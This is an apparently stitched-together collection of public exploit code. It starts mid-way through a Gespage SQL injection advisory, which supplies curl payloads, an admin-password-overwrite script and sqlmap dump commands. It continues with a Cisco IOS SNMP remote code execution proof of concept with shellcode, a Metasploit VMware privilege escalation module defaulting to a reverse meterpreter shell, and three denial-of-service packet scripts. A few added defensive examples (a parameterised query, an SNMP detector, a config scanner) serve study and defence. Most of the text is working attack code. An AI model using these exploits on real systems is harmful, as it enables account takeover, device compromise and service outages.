Parameter: show_month
HTTP Method: Post
* Page: http://URL/ges/webapp/users/prhistory.jsp
Parameter: show_month
HTTP Method: Post
We can then detect the SQL injection by requesting the server with the curl tool, including a simple payload executing a sleep of different durations:
* Normal request:
```
curl --cookie "JSESSIONID=YOUR_COOKIE_HERE" -X POST -d "show_prn=1" \
  https://172.16.217.134:7181/gespage/webapp/users/prnow.jsp --insecure \
  -w "\nResponse Time:%{time_total}\n"
Curl output: Response Time:0,122
```
* Sleep injection of 3 seconds into the request:
```
curl --cookie "JSESSIONID=YOUR_COOKIE_HERE" -X POST \
  -d "show_prn=1');SELECT PG_SLEEP(3)--" \
  https://172.16.217.134:7181/gespage/webapp/users/prnow.jsp --insecure \
  -w "\nResponse Time:%{time_total}\n"
Curl output: Response Time: 3,126
```
* Sleep injection of 6 seconds into the request:
```
curl --cookie "JSESSIONID=YOUR_COOKIE_HERE" -X POST \
  -d "show_prn=1');SELECT PG_SLEEP(6)--" \
  https://172.16.217.134:7181/gespage/webapp/users/prnow.jsp --insecure \
  -w "\nResponse Time:%{time_total}\n"
Curl output: Response Time: 6,126
```
We created a dedicated python script to change the web admin password in order to compromise the web application:
```
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
$ python update_gespage_pwd.py -c e06d40bc855c98751a5a2ff49daa -i http://192.168.160.128:7180/gespage -p 12345
[+] Generating the new admin password hash
 => Password hash (sha1) to inject in the Database: 8cb2237d0679ca88db6464eac60da96345513964
[+] Verifying connection to the web interface: http://192.168.160.128:7180/gespage/
 => Connection OK
[+] Exploiting the SQL injection
 => Vulnerable page: http://192.168.160.128:7180/gespage/webapp/users/prnow.jsp
 => Posting Data : show_prn=A-PRINTER-ON-THE-WEB-LIST');UPDATE param_gespage SET param_value='8cb2237d0679ca88db6464eac60da96345513964' WHERE param_id='admin_pwd'--
[+] Go to the web admin interface, http://192.168.160.128:7180/admin/ and log on with admin:12345
"""

from argparse import ArgumentParser
from hashlib import sha1
from requests import Session
from urllib3 import disable_warnings


def exploit(args):
    if args.ip_url[-1] != "/":
        args.ip_url += "/"
    print "[+] Generating the new admin password hash"
    new_admin_pwd_hash = sha1(args.password).hexdigest()
    print " => Password hash (sha1) to inject in the Database: %s" % (new_admin_pwd_hash)
    print "[+] Verifying connection to the web interface: %s" % (args.ip_url)
    web_session = web_connection(args.ip_url, args.cookie)
    print "[+] Exploiting the SQL injection"
    sql_injection(args.ip_url, web_session, args.cookie, new_admin_pwd_hash)
    print "[+] Go to the web admin interface, %s and log on with admin:%s" % (args.ip_url.replace('gespage', 'admin'), args.password)


def sql_injection(url, session, user_cookie, new_admin_pwd_hash):
    vulnerable_url = url + "webapp/users/prnow.jsp"
    # Stacked query: close the original statement, run the UPDATE, comment out the rest
    sql_update_query = "UPDATE param_gespage SET param_value='%s' WHERE param_id='admin_pwd'" % (new_admin_pwd_hash)
    sql_injection_payload = "A-PRINTER-ON-THE-WEB-LIST');%s--" % (sql_update_query)
    print " => Vulnerable page: %s" % (vulnerable_url)
    print " => Posting Data : show_prn=%s" % (sql_injection_payload)
    response = session.post(vulnerable_url, cookies={"JSESSIONID": user_cookie}, verify=False,
                            allow_redirects=True, data={"show_prn": sql_injection_payload})
    if not response.status_code == 200:
        print " There is an error while posting the payload, try with sqlmap.py"
        exit(2)


def web_connection(url, user_cookie):
    disable_warnings()
    session = Session()
    response = session.get(url, verify=False, allow_redirects=False, cookies={"JSESSIONID": user_cookie})
    # An authenticated session is redirected to the user's main page
    if (response.status_code == 302 and "webapp/user_main.xhtml" in response.text):
        print " => Connection OK"
        return session
    else:
        print " /!\ Error while connecting the web interface with the specified JSESSIONID cookie"
        print " => Make sure given application URL and JSESSIONID cookie are correct "
        exit(1)


if __name__ == '__main__':
    parser = ArgumentParser(description='Exploit Gespage SQL injection by updating the admin password. '
                                        'You must create then specify an existing user in order to exploit the vulnerability')
    parser.add_argument('-i', '--ip_url', help='The web interface URL, ex: http://IP_ADDRESS:7181/gespage/', required=True)
    parser.add_argument('-c', '--cookie', help='JSESSIONID cookie of an authenticated user', required=True)
    parser.add_argument('-p', '--password', help='New admin password', required=True)
    exploit(parser.parse_args())
```
Using [sqlmap](https://github.com/sqlmapproject/sqlmap), it is also possible to dump the content of the database, write other data, etc.

Dumping the admin password hash (if changed from the initial 123456 password):
```
python sqlmap.py -u "https://URL:7181/gespage/users/prnow.jsp"
--cookie="JSESSIONID=YOUR_COOKIE_HERE"
--data="show_prn=A-PRINTER-ON-THE-WEB-LIST" --dbms=PostgreSQL --risk 3
--level 5 --technique TS -D public -T param_gespage -C param_value
--time-sec 2 --dump --flush-session
```
Dumping the users table:
```
sqlmap.py -u "https://URL:7181/gespage/users/prnow.jsp"
--cookie="JSESSIONID=YOUR_COOKIE_HERE"
--data="show_prn=A-PRINTER-ON-THE-WEB-LIST" --dbms=PostgreSQL --risk 3
--level 5 --technique TS -D public -T users --time-sec 2 --dump
```
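The injection the script above relies on, next to the parameterised query that closes it, as an added example that is not part of the Sysdream advisory or of the Gespage code base. It uses an in-memory SQLite database as a stand-in for the PostgreSQL backend the sqlmap commands target; the table layout (only `param_gespage` and the `admin_pwd` row come from the advisory), the `printers` table and the shape of the original `show_prn` query are assumptions modelled on the payload string:

```python
import sqlite3

# Constructed stand-in for the Gespage schema: the param_gespage table and its
# 'admin_pwd' row are taken from the advisory, everything else is assumed.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE param_gespage (param_id TEXT PRIMARY KEY, param_value TEXT)")
    db.execute("INSERT INTO param_gespage VALUES ('admin_pwd', 'hash-of-123456')")
    db.execute("CREATE TABLE printers (name TEXT)")
    db.execute("INSERT INTO printers VALUES ('A-PRINTER-ON-THE-WEB-LIST')")
    db.commit()
    return db

def admin_hash(db):
    row = db.execute("SELECT param_value FROM param_gespage WHERE param_id = 'admin_pwd'").fetchone()
    return row[0]

# Same shape as the advisory's show_prn payload: close the quoted value and the
# parenthesis, stack an UPDATE, comment out the rest of the original statement.
PAYLOAD = ("A-PRINTER-ON-THE-WEB-LIST');"
           "UPDATE param_gespage SET param_value='attacker-hash' WHERE param_id='admin_pwd'--")

def vulnerable_show_prn(db, show_prn):
    """The request parameter is pasted into the SQL text (assumed query shape).

    executescript() runs every ';'-separated statement it is given, which mirrors
    the stacked-query behaviour the advisory exploits on the PostgreSQL backend."""
    sql = "SELECT name FROM printers WHERE name IN ('%s')" % show_prn
    db.executescript(sql)

def safe_show_prn(db, show_prn):
    """The request parameter is bound as a value and is never parsed as SQL.

    sqlite3's execute() additionally raises ProgrammingError when handed more than
    one statement, so even a string-built query could not stack an UPDATE here."""
    rows = db.execute("SELECT name FROM printers WHERE name IN (?)", (show_prn,))
    return [r[0] for r in rows]

def demo():
    """Run the same payload through both handlers and report the admin hash afterwards."""
    db = make_db()
    vulnerable_show_prn(db, PAYLOAD)
    after_vulnerable = admin_hash(db)      # the stacked UPDATE ran: 'attacker-hash'

    db = make_db()
    rows = safe_show_prn(db, PAYLOAD)      # []: no printer has that literal name
    after_safe = admin_hash(db)            # unchanged: 'hash-of-123456'
    return after_vulnerable, after_safe, rows

if __name__ == "__main__":
    print(demo())
```

The fix in the application is the second handler: a prepared statement with the value bound, which is also what removes the need for the `--` comment trick to matter at all.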
## Timeline (dd/mm/yyyy)
* 06/03/2017 : Initial discovery
* 13/03/2017 : First contact attempt (Web form)
* 21/04/2017 : Second contact attempt (public e-mail address)
* 23/06/2017 : Phone call and successful e-mail contact
* 23/06/2017 : Technical details sent to the editor
* 20/07/2017 : No reply, follow-up e-mail
* 27/07/2017 : Reply: fix planned for major release 7.5.0 in late September
* 17/09/2017 : Informing the editor that we would publish in October
* 03/10/2017 : Feedback from Gespage informing us that the issue has been
fixed with version 7.4.9.
* 02/01/2018 : Release of the advisory
## Fixes
Upgrade to Gespage 7.4.9
## Affected versions
* Versions up to 7.4.8
## Credits
* Mickael KARATEKIN <m.karatekin@sysdream.com>
-- SYSDREAM Labs <labs@sysdream.com>
GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1
* Website: https://sysdream.com/
* Twitter: @sysdream
#!/usr/bin/env python
if False: '''
CVE-2017-6736 / cisco-sa-20170629-snmp Cisco IOS remote code execution
===================
This repository contains Proof-Of-Concept code for exploiting remote code execution vulnerability in SNMP service disclosed by Cisco Systems on June 29th 2017 - <https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170629-snmp>
Description
-------------
RCE exploit code is available for Cisco Integrated Service Router 2811. This exploit is firmware dependent. The latest firmware version is supported:
- Cisco IOS Software, 2800 Software (C2800NM-ADVENTERPRISEK9-M), Version 15.1(4)M12a, RELEASE SOFTWARE (fc1)
ROM Monitor version:
- System Bootstrap, Version 12.4(13r)T, RELEASE SOFTWARE (fc1)
Read-only community string is required to trigger the vulnerability.
Shellcode
------------
The exploit requires shellcode as HEX input. This repo contains an example shellcode for bypassing authentication in telnet service and in enable prompt. Shellcode to revert changes is also available. If you want to write your own shellcode feel free to do so. Just have two things in mind:
- Don't upset the watchdog by running your code for too long. Call a sleep function once in a while.
- Return execution flow back to SNMP service at the end. You can use last opcodes from the demo shellcode:
```
3c1fbfc4 lui $ra, 0xbfc4
37ff89a8 ori $ra, $ra, 0x89a8
03e00008 jr $ra
00000000 nop
```
Usage example
-------------
```
$ sudo python c2800nm-adventerprisek9-mz.151-4.M12a.py 192.168.88.1 public 8fb40250000000003c163e2936d655b026d620000000000002d4a821000000008eb60000000000003c1480003694f000ae96000000000000aea00000000000003c1fbfc437ff89a803e0000800000000
Writing shellcode to 0x8000f000
.
Sent 1 packets.
0x8000f0a4: 8fb40250 lw $s4, 0x250($sp)
.
Sent 1 packets.
0x8000f0a8: 00000000 nop
.
Sent 1 packets.
0x8000f0ac: 3c163e29 lui $s6, 0x3e29
.
Sent 1 packets.
0x8000f0b0: 36d655b0 ori $s6, $s6, 0x55b0
```
Notes
-----------
Firmware version can be read via snmpget command:
```
$ snmpget -v 2c -c public 192.168.88.1 1.3.6.1.2.1.1.1.0
SNMPv2-MIB::sysDescr.0 = STRING: Cisco IOS Software, 2800 Software (C2800NM-ADVENTERPRISEK9-M), Version 15.1(4)M12a, RELEASE SOFTWARE (fc1)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2016 by Cisco Systems, Inc.
Compiled Tue 04-Oct-16 03:37 by prod_rel_team
```
Author
------
Artem Kondratenko https://twitter.com/artkond
## Shellcode
8fb40250000000003c163e2936d655b026d620000000000002d4a821000000008eb60000000000003c1480003694f000ae96000000000000aea00000000000003c1fbfc437ff89a803e0000800000000
## unset_shellcode
8fb40250000000003c163e2936d655b026d620000000000002d4a821000000003c1480003694f0008e96000000000000aeb60000000000003c1fbfc437ff89a803e0000800000000
'''
from scapy.all import *
from time import sleep
from struct import pack, unpack
import random
import argparse
import sys
from termcolor import colored

try:
    cs = __import__('capstone')
except ImportError:
    pass

def bin2oid(buf):
    return ''.join(['.' + str(unpack('B',x)[0]) for x in buf])

def shift(s, offset):
    res = pack('>I', unpack('>I', s)[0] + offset)
    return res

alps_oid = '1.3.6.1.4.1.9.9.95.1.3.1.1.7.108.39.84.85.195.249.106.59.210.37.23.42.103.182.75.232.81{0}{1}{2}{3}{4}{5}{6}{7}.14.167.142.47.118.77.96.179.109.211.170.27.243.88.157.50{8}{9}.35.27.203.165.44.25.83.68.39.22.219.77.32.38.6.115{10}{11}.11.187.147.166.116.171.114.126.109.248.144.111.30'
shellcode_start = '\x80\x00\xf0\x00'

if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument("host", type=str, help="host IP")
    parser.add_argument("community", type=str, help="community string")
    parser.add_argument("shellcode", action='store', type=str, help='shellcode to run (in hex)')
    args = parser.parse_args()

    sh_buf = args.shellcode.replace(' ','').decode('hex')
    print 'Writing shellcode to 0x{}'.format(shellcode_start.encode('hex'))

    if 'capstone' in sys.modules:
        md = cs.Cs(cs.CS_ARCH_MIPS, cs.CS_MODE_MIPS32 | cs.CS_MODE_BIG_ENDIAN)

    for k, sh_dword in enumerate([sh_buf[i:i+4] for i in range(0, len(sh_buf), 4)]):
        s0 = bin2oid(sh_dword) # shellcode dword
        s1 = bin2oid('\x00\x00\x00\x00')
        s2 = bin2oid('\xBF\xC5\xB7\xDC')
        s3 = bin2oid('\x00\x00\x00\x00')
        s4 = bin2oid('\x00\x00\x00\x00')
        s5 = bin2oid('\x00\x00\x00\x00')
        s6 = bin2oid('\x00\x00\x00\x00')
        ra = bin2oid('\xbf\xc2\x2f\x60') # return control flow jumping over 1 stack frame
        s0_2 = bin2oid(shift(shellcode_start, k * 4))
        ra_2 = bin2oid('\xbf\xc7\x08\x60')
        s0_3 = bin2oid('\x00\x00\x00\x00')
        ra_3 = bin2oid('\xBF\xC3\x86\xA0')
        payload = alps_oid.format(s0, s1, s2, s3, s4, s5, s6, ra, s0_2, ra_2, s0_3, ra_3)
        send(IP(dst=args.host)/UDP(sport=161,dport=161)/SNMP(community=args.community,PDU=SNMPget(varbindlist=[SNMPvarbind(oid=payload)])))
        cur_addr = unpack(">I",shift(shellcode_start, k * 4 + 0xa4))[0]
        if 'capstone' in sys.modules:
            for i in md.disasm(sh_dword, cur_addr):
                color = 'green'
                print("0x%x:\t%s\t%s\t%s" %(i.address, sh_dword.encode('hex'), colored(i.mnemonic, color), colored(i.op_str, color)))
        else:
            print("0x%x:\t%s" %(cur_addr, sh_dword.encode('hex')))
        sleep(1)

    ans = raw_input("Jump to shellcode? [yes]: ")
    if ans == 'yes':
        ra = bin2oid(shift(shellcode_start, 0xa4)) # return control flow jumping over 1 stack frame
        zero = bin2oid('\x00\x00\x00\x00')
        payload = alps_oid.format(zero, zero, zero, zero, zero, zero, zero, ra, zero, zero, zero, zero)
        send(IP(dst=args.host)/UDP(sport=161,dport=161)/SNMP(community=args.community,PDU=SNMPget(varbindlist=[SNMPvarbind(oid=payload)])))
        print 'Jump taken!'
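A defender-side check for this class of request, added here and not part of the exploit or of Cisco's advisory. The script packs its stack overwrite into the sub-identifiers of a single GET OID, so a request whose OID runs to well over a hundred arcs under `1.3.6.1.4.1.9.9.95` (the prefix of the script's `alps_oid` template) looks nothing like a normal poll of `sysDescr.0`. The arc thresholds, the verdict names and the sample records are assumptions; the sample's long OID only copies the length of the filled-in template, not its contents:

```python
# SNMP GET OID sanity check for monitoring or capture review. Added example; the
# ALPS prefix is the start of the exploit's alps_oid template, thresholds are assumed.
RFC_MAX_ARCS = 128          # RFC 2578: an OID has at most 128 sub-identifiers
ODD_ARCS = 32               # assumption: legitimate object instances are far shorter
ALPS_PREFIX = "1.3.6.1.4.1.9.9.95"
BENIGN_SYSDESCR = "1.3.6.1.2.1.1.1.0"   # sysDescr.0, as queried with snmpget in the notes

def parse_oid(oid):
    """Dotted OID string -> list of non-negative ints (ValueError on anything else)."""
    text = oid.strip()
    if text.startswith("."):
        text = text[1:]
    arcs = [int(p) for p in text.split(".")]
    if len(arcs) < 2 or any(a < 0 for a in arcs):
        raise ValueError("not an OID: %r" % oid)
    return arcs

def under(arcs, prefix):
    p = parse_oid(prefix)
    return arcs[:len(p)] == p

def classify_oid(oid):
    """Return 'invalid', 'alert', 'suspicious', 'watch' or 'ok' for one OID."""
    arcs = parse_oid(oid)
    if len(arcs) > RFC_MAX_ARCS:
        return "invalid"
    in_alps = under(arcs, ALPS_PREFIX)
    if in_alps and len(arcs) > ODD_ARCS:
        return "alert"          # very long OID under the subtree the exploit targets
    if len(arcs) > ODD_ARCS:
        return "suspicious"     # very long OID elsewhere: still worth a look
    if in_alps:
        return "watch"          # ordinary-looking access to a MIB the advisory lists
    return "ok"

def scan_requests(records):
    """records: iterable of (src_ip, oid) pairs, e.g. from a parsed capture.
    Returns (src_ip, oid, verdict) for every request that is not 'ok'."""
    out = []
    for src, oid in records:
        try:
            verdict = classify_oid(oid)
        except ValueError:
            verdict = "invalid"
        if verdict != "ok":
            out.append((src, oid, verdict))
    return out

# Constructed sample: a normal sysDescr query, a short object under the ALPS
# subtree, and a GET whose OID has 124 arcs, the length of the exploit's template.
SAMPLE = [
    ("10.0.0.5", BENIGN_SYSDESCR),
    ("10.0.0.5", ALPS_PREFIX + ".1.3.1.1.7"),
    ("10.0.0.9", ALPS_PREFIX + ".1.3.1.1.7" + ".0" * 110),
]

if __name__ == "__main__":
    for hit in scan_requests(SAMPLE):
        print("%s  %-8s %s" % (hit[0], hit[2], hit[1]))
```

Because the read-only community string is all the exploit needs, the check belongs on whatever sees SNMP traffic before the router does (a span port, the management VLAN's firewall); on the device itself the advisory-level mitigation is to restrict which MIBs the community can reach.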
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Exploit::EXE
  include Msf::Post::File
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'VMware Workstation ALSA Config File Local Privilege Escalation',
      'Description'    => %q{
        This module exploits a vulnerability in VMware Workstation Pro and
        Player on Linux which allows users to escalate their privileges by
        using an ALSA configuration file to load and execute a shared object
        as root when launching a virtual machine with an attached sound card.

        This module has been tested successfully on VMware Player version
        12.5.0 on Debian Linux.
      },
      'References'     =>
        [
          [ 'CVE', '2017-4915' ],
          [ 'EDB', '42045' ],
          [ 'BID', '98566' ],
          [ 'URL', 'https://gist.github.com/bcoles/cd26a831473088afafefc93641e184a9' ],
          [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2017-0009.html' ],
          [ 'URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1142' ]
        ],
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Jann Horn', # Discovery and PoC
          'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
        ],
      'DisclosureDate' => 'May 22 2017',
      'Platform'       => 'linux',
      'Targets'        =>
        [
          [ 'Linux x86', { 'Arch' => ARCH_X86 } ],
          [ 'Linux x64', { 'Arch' => ARCH_X64 } ]
        ],
      'DefaultOptions' =>
        {
          'Payload'     => 'linux/x64/meterpreter_reverse_tcp',
          'WfsDelay'    => 30,
          'PrependFork' => true
        },
      'DefaultTarget'  => 1,
      'Arch'           => [ ARCH_X86, ARCH_X64 ],
      'SessionTypes'   => [ 'shell', 'meterpreter' ],
      'Privileged'     => true ))
    register_options [
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
    ]
  end

  def has_prereqs?
    vmplayer = cmd_exec 'which vmplayer'
    if vmplayer.include? 'vmplayer'
      vprint_good 'vmplayer is installed'
    else
      print_error 'vmplayer is not installed. Exploitation will fail.'
      return false
    end

    gcc = cmd_exec 'which gcc'
    if gcc.include? 'gcc'
      vprint_good 'gcc is installed'
    else
      print_error 'gcc is not installed. Compiling will fail.'
      return false
    end

    true
  end

  def check
    unless has_prereqs?
      print_error 'Target missing prerequisites'
      return CheckCode::Safe
    end

    begin
      config = read_file '/etc/vmware/config'
    rescue
      config = ''
    end

    if config =~ /player\.product\.version\s*=\s*"([\d\.]+)"/
      @version = Gem::Version.new $1.gsub(/\.$/, '')
      vprint_status "VMware is version #{@version}"
    else
      print_error "Could not determine VMware version."
      return CheckCode::Unknown
    end

    if @version < Gem::Version.new('12.5.6')
      print_good 'Target version is vulnerable'
      return CheckCode::Vulnerable
    end

    print_error 'Target version is not vulnerable'
    CheckCode::Safe
  end

  def exploit
    if check == CheckCode::Safe
      print_error 'Target machine is not vulnerable'
      return
    end

    @home_dir = cmd_exec 'echo ${HOME}'
    unless @home_dir
      print_error "Could not find user's home directory"
      return
    end

    @prefs_file = "#{@home_dir}/.vmware/preferences"

    fname = ".#{rand_text_alphanumeric rand(10) + 5}"
    @base_dir = "#{datastore['WritableDir']}/#{fname}"
    cmd_exec "mkdir #{@base_dir}"

    so = %Q^
    /*
    Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1142
    Original shared object code by jhorn
    */
    #define _GNU_SOURCE
    #include <stdlib.h>
    #include <string.h>
    #include <stdio.h>
    #include <unistd.h>
    #include <fcntl.h>
    #include <sys/prctl.h>
    #include <err.h>

    extern char *program_invocation_short_name;

    __attribute__((constructor)) void run(void) {
      uid_t ruid, euid, suid;
      if (getresuid(&ruid, &euid, &suid))
        err(1, "getresuid");
      if (ruid == 0 || euid == 0 || suid == 0) {
        if (setresuid(0, 0, 0) || setresgid(0, 0, 0))
          err(1, "setresxid");
        system("#{@base_dir}/#{fname}.elf");
        _exit(0);
      }
    }
    ^

    vprint_status "Writing #{@base_dir}/#{fname}.c"
    write_file "#{@base_dir}/#{fname}.c", so

    vprint_status "Compiling #{@base_dir}/#{fname}.o"
    output = cmd_exec "gcc -fPIC -shared -o #{@base_dir}/#{fname}.so #{@base_dir}/#{fname}.c -Wall -ldl -std=gnu99"
    unless output == ''
      print_error "Compilation failed: #{output}"
      return
    end

    vmx = %Q|
    .encoding = "UTF-8"
    config.version = "8"
    virtualHW.version = "8"
    scsi0.present = "FALSE"
    memsize = "4"
    ide0:0.present = "FALSE"
    sound.present = "TRUE"
    sound.fileName = "-1"
    sound.autodetect = "TRUE"
    vmci0.present = "FALSE"
    hpet0.present = "FALSE"
    displayName = "#{fname}"
    guestOS = "other"
    nvram = "#{fname}.nvram"
    virtualHW.productCompatibility = "hosted"
    gui.exitOnCLIHLT = "FALSE"
    powerType.powerOff = "soft"
    powerType.powerOn = "soft"
    powerType.suspend = "soft"
    powerType.reset = "soft"
    floppy0.present = "FALSE"
    monitor_control.disable_longmode = 1
    |

    vprint_status "Writing #{@base_dir}/#{fname}.vmx"
    write_file "#{@base_dir}/#{fname}.vmx", vmx

    vprint_status "Writing #{@base_dir}/#{fname}.elf"
    write_file "#{@base_dir}/#{fname}.elf", generate_payload_exe

    vprint_status "Setting #{@base_dir}/#{fname}.elf executable"
    cmd_exec "chmod +x #{@base_dir}/#{fname}.elf"

    asoundrc = %Q|
    hook_func.pulse_load_if_running {
      lib "#{@base_dir}/#{fname}.so"
      func "conf_pulse_hook_load_if_running"
    }
    |

    vprint_status "Writing #{@home_dir}/.asoundrc"
    write_file "#{@home_dir}/.asoundrc", asoundrc

    vprint_status 'Disabling VMware hint popups'

    unless directory? "#{@home_dir}/.vmware"
      cmd_exec "mkdir #{@home_dir}/.vmware"
      @remove_prefs_dir = true
    end

    if file? @prefs_file
      begin
        prefs = read_file @prefs_file
      rescue
        prefs = ''
      end
    end

    if prefs.blank?
      prefs = ".encoding = \"UTF8\"\n"
      prefs << "pref.vmplayer.firstRunDismissedVersion = \"999\"\n"
      prefs << "hints.hideAll = \"TRUE\"\n"
      @remove_prefs_file = true
    elsif prefs =~ /hints\.hideAll/i
      prefs.gsub!(/hints\.hideAll.*$/i, 'hints.hideAll = "TRUE"')
    else
      prefs.sub!(/\n?\z/, "\nhints.hideAll = \"TRUE\"\n")
    end

    vprint_status "Writing #{@prefs_file}"
    write_file "#{@prefs_file}", prefs

    print_status 'Launching VMware Player...'
    cmd_exec "vmplayer #{@base_dir}/#{fname}.vmx"
  end

  def cleanup
    print_status "Removing #{@base_dir} directory"
    cmd_exec "rm '#{@base_dir}' -rf"

    print_status "Removing #{@home_dir}/.asoundrc"
    cmd_exec "rm '#{@home_dir}/.asoundrc'"

    if @remove_prefs_dir
      print_status "Removing #{@home_dir}/.vmware directory"
      cmd_exec "rm '#{@home_dir}/.vmware' -rf"
    elsif @remove_prefs_file
      print_status "Removing #{@prefs_file}"
      cmd_exec "rm '#{@prefs_file}' -rf"
    end
  end

  def on_new_session(session)
    # if we don't /bin/sh here, our payload times out
    session.shell_command_token '/bin/sh'
    super
  end
end
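The module works because a privileged `vmplayer` process honours the unprivileged user's `~/.asoundrc`, whose `hook_func` stanza points libasound at a shared object in a world-writable directory. A host-side check for that condition, added here and not part of the Metasploit module or of VMware's fix: it parses hook stanzas of the shape the module writes and reports any `lib` given as an explicit path outside the system library directories. The trusted directory list, the rule that bare plugin names are trusted, and both sample configs are assumptions:

```python
import os
import re

# Added example. Directories assumed to hold vendor-installed ALSA plugins. A bare
# library name (no '/') is resolved by libasound from its own plugin directory
# and is treated as trusted here (assumption); explicit paths are checked.
TRUSTED_LIB_DIRS = ("/usr/lib", "/usr/lib64", "/lib", "/usr/share/alsa")

HOOK_RE = re.compile(r"hook_func\.([A-Za-z0-9_]+)\s*\{(.*?)\}", re.S)
LIB_RE = re.compile(r'\blib\s+"([^"]+)"')

def _trusted_path(path):
    norm = os.path.normpath(path)
    return any(norm == d or norm.startswith(d + os.sep) for d in TRUSTED_LIB_DIRS)

def untrusted_hook_libs(config_text):
    """Return [(hook_name, lib)] for every hook_func lib that is an explicit
    path (absolute or relative) outside TRUSTED_LIB_DIRS."""
    findings = []
    for m in HOOK_RE.finditer(config_text):
        hook, body = m.group(1), m.group(2)
        for lib in LIB_RE.findall(body):
            if "/" not in lib:
                continue                       # plugin name, resolved by libasound
            if not os.path.isabs(lib) or not _trusted_path(lib):
                findings.append((hook, lib))
    return findings

def should_honour_user_config(ruid, euid):
    """The root cause in one line: a process whose effective uid differs from the
    invoking user's real uid (set-uid in effect) must not load per-user config.
    The module's C stub tests the same ids the other way round, to detect root."""
    return ruid == euid

def scan_user_asoundrc(home):
    """Read ~/.asoundrc under `home` if present and return findings (empty when absent)."""
    path = os.path.join(home, ".asoundrc")
    if not os.path.isfile(path):
        return []
    with open(path, encoding="utf-8", errors="replace") as fh:
        return untrusted_hook_libs(fh.read())

# Constructed samples: the first is modelled on the stanza the module writes,
# the second on a distribution-provided PulseAudio hook.
MALICIOUS_ASOUNDRC = '''
hook_func.pulse_load_if_running {
    lib "/tmp/.k3Qz9/.k3Qz9.so"
    func "conf_pulse_hook_load_if_running"
}
'''
BENIGN_ASOUNDRC = '''
hook_func.pulse_load_if_running {
    lib "libasound_module_conf_pulse.so"
    func "conf_pulse_hook_load_if_running"
}
'''

if __name__ == "__main__":
    print(untrusted_hook_libs(MALICIOUS_ASOUNDRC))   # [('pulse_load_if_running', '/tmp/...')]
    print(untrusted_hook_libs(BENIGN_ASOUNDRC))      # []
```

The scan is a compensating control for hosts that cannot move to 12.5.6 yet (the version the module's `check` treats as fixed); it is useful mainly because a `hook_func` pointing into `/tmp` or a home directory has no legitimate reason to exist on a workstation.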
# Exploit Title: VX Search Enterprise Server v10.1.12 - Denial of Service
# Date: 2017-10-20
# Exploit Author: Ahmad Mahfouz
# Software Link: http://www.vxsearch.com/setups/vxsearchsrv_setup_v10.1.12.exe
# Version: v10.1.12
# Category: Windows Remote DOS
# CVE: CVE-2017-15662
# Author Homepage: www.unixawy.com
# Description: In Flexense VX Search Enterprise Server v10.1.12, the Control Protocol suffers from a denial of service. The attack vector is a crafted SERVER_GET_INFO packet sent to control port 9123.
import socket
target = "192.168.72.231"
port = 9123
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((target,port))
packet = "\x75\x19\xba\xab\x03"
packet +="\x00\x00\x00\x01\x00\x00\x00\x1a"
packet += "\x00"
packet += "\x3e" #evil
packet += "\x00"
packet += "\x20"
packet += "\x00"
packet += "\x00"
packet += "\x00"
packet += "\x00\x00\x00\x00"
packet += "SERVER_GET_INFO"
packet += "\x02\x32\x01"
packet += "Data"
packet += "\x01\x30\x01\x00"
packet += "\x04\x02\x74"
packet += "\x18\x18\x00"
s.send(packet)
try:
    data = s.recv(100)
    print data
except:
    print "K1LL3D"
# Exploit Title: Disk Pulse Enterprise Server v10.1.18 - Denial of Service
# Date: 2017-10-20
# Exploit Author: Ahmad Mahfouz
# Software Link: http://www.diskpulse.com/setups/diskpulsesrv_setup_v10.1.18.exe
# Version: v10.1.18
# Category: Windows Remote DOS
# CVE: CVE-2017-15663
# Author Twitter: @eln1x
# Description: In Disk Pulse Enterprise Server v10.1.18, the Control Protocol suffers from a denial of service. The attack vector is a crafted SERVER_GET_INFO packet sent to control port 9120.
import socket
target = "192.168.72.231"
port = 9120
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((target,port))
packet = "\x75\x19\xba\xab\x03"
packet +="\x00\x00\x00\x01\x00\x00\x00\x1a"
packet += "\x00"
packet += "\x3e" #evil
packet += "\x00"
packet += "\x20"
packet += "\x00"
packet += "\x00"
packet += "\x00"
packet += "\x00\x00\x00\x00"
packet += "SERVER_GET_INFO"
packet += "\x02\x32\x01"
packet += "Data"
packet += "\x01\x30\x01\x00"
packet += "\x04\x02\x74"
packet += "\x18\x18\x00"
s.send(packet)
try:
    data = s.recv(100)
    print data
except:
    print "K1LL3D"
# Exploit Title: DiskBoss Enterprise Server 8.5.12 - Denial of Service
# Date: 2017-10-20
# Exploit Author: Ahmad Mahfouz
# Software Link: http://www.diskboss.com/setups/diskbosssrv_setup_v8.5.12.exe
# Version: v10.1.16
# Category: Windows Remote DOS
# CVE: CVE-2017-15665
# Author Homepage: www.unixawy.com
# Description: In DiskBoss Enterprise Server 8.5.12, the Control Protocol suffers from a denial of service. The attack vector is a crafted SERVER_GET_INFO packet sent to control port 8094.
#!/usr/bin/env python
import socket
target = "192.168.72.133"
port = 8094
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((target,port))
packet = "\x75\x19\xba\xab\x03"
packet +="\x00\x00\x00\x01\x00\x00\x00\x1a"
packet += "\x00"
packet += "\x3e"
packet += "\x00"
packet += "\x20"
packet += "\x00"
packet += "\x00"
packet += "\x00"
packet += "\x00\x00\x00\x00"
packet += "SERVER_GET_INFO"
packet += "\x02\x32\x01"
packet += "Data"
packet += "\x01\x30\x01\x00"
packet += "\x04\x02\x74"
packet += "\x18\x18\x00"
s.send(packet)
try:
    data = s.recv(100)
except:
    print "K1LL3D"
